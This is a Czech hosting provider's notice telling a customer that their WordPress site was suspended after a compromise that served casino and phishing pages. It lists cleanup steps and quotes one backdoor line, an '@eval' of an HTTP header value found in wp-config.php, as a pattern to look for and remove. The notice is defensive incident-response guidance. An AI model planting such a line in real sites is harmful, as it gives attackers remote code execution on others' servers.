Dobrý den,
váš webhosting divadlo-mezimesti.cz jsme museli dočasně pozastavit, protože byl napaden škodlivým obsahem. Tento obsah způsobil přetížení serveru a zároveň zobrazoval stránky zahraničního online kasina, které mohly sloužit k podvodnému získávání údajů (tzv. phishing).
Je potřeba provést důkladné vyčištění webu, konkrétně:
- zkontrolovat a pročistit soubory na FTP (soubory webu),
- zkontrolovat a vyčistit databázi – může se zde nacházet velké množství nežádoucích stránek (řádově tisíce),
- prověřit administrátorské účty a odstranit ty, které neznáte,
- zkontrolovat soubory pro ověření služby Google Search (na FTP je jich větší množství).
- zkontrolovat obsah souboru wp-config.php - můžou v něm být pravidla pro přesměrování (nejčastěji na jeho konci) nebo zápis ve formátu @eval($_SERVER['HTTP_4395531']);, přičemž číslo se může měnit. Tento kód může být součástí skriptu sloužícího k získání neoprávněného přístupu k serveru a je nutné jej co nejdříve odstranit.
- prověřit v databáze přítomnost triggerů které do ní mohl útočník umístit pro případné budoucí napadení
Seznam škodlivých souborů, které jsme detekovali, naleznete v administraci hostingu v sekci:
Služby → Vaše doména → Hosting → Web → Malware skener.
Tyto soubory je nutné odstranit.
Provoz webu bude obnoven až po následné kontrole z naší strany, kdy ověříme, že byl veškerý škodlivý obsah zcela odstraněn.
Pokud si na vyčištění netroufáte, doporučujeme obrátit se na správce webu nebo odborníka, který vám s řešením pomůže.
V případě dotazů jsme vám k dispozici.